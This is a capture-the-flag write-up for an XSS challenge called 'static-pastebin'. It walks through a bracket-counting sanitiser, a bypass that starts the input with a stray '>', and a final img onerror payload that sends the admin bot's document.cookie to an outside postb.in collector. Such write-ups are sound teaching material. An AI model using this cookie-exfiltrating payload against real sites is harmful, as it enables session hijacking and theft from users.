static-pastebin¶
This is a typical XSS challenge where we want the bot to visit our pastebin and execute js to get the cookie.
Filters and Network¶
I tried to input some strings in the pastebin and monitored the network activity. There is no POST request and when I check the url it had a base 64 string as an argument. This means that all the websites does is encode the string we input then decode it when we need to display it.
So I tried the basic form of XSS
function clean(input) {
let brackets = 0;
let result = '';
for (let i = 0; i < input.length; i++) {
const current = input.charAt(i);
if (current == '<') {
brackets ++;
}
if (brackets == 0) {
result += current;
}
if (current == '>') {
brackets --;
}
}
return result
}
clean() function. It basically counts the amount of < and > and determin whether to display the text.
Bypassing the filter¶
We can simply bypass the filter by setting the value of brackets to -1 before we enter our script tags so that everything between the script tags get's displayed.
alert() doesn't show up due to the value of brackets.
Alternate form of XSS¶
There are many forms of XSS, including ones that have the script within the angle brackets, for example this one:
And surely it worked, now we need to grab the cookie of the admin bot.post bin¶
Post Bin is a tool that could collect all requests to a certain url and we can grab the document.cookie js variable by adding it as an argument.
Heres the final payload
><img src=x onerror="javascript:window.location.assign(`https://postb.in/1593716639876-9019670642446?cookie=${document.cookie}`)">
Flag¶
I bas64 encoded the string then appended it to the url then fed it to the bot. And surely, on my post bin page, I got a request that contains the document cookie which is the flag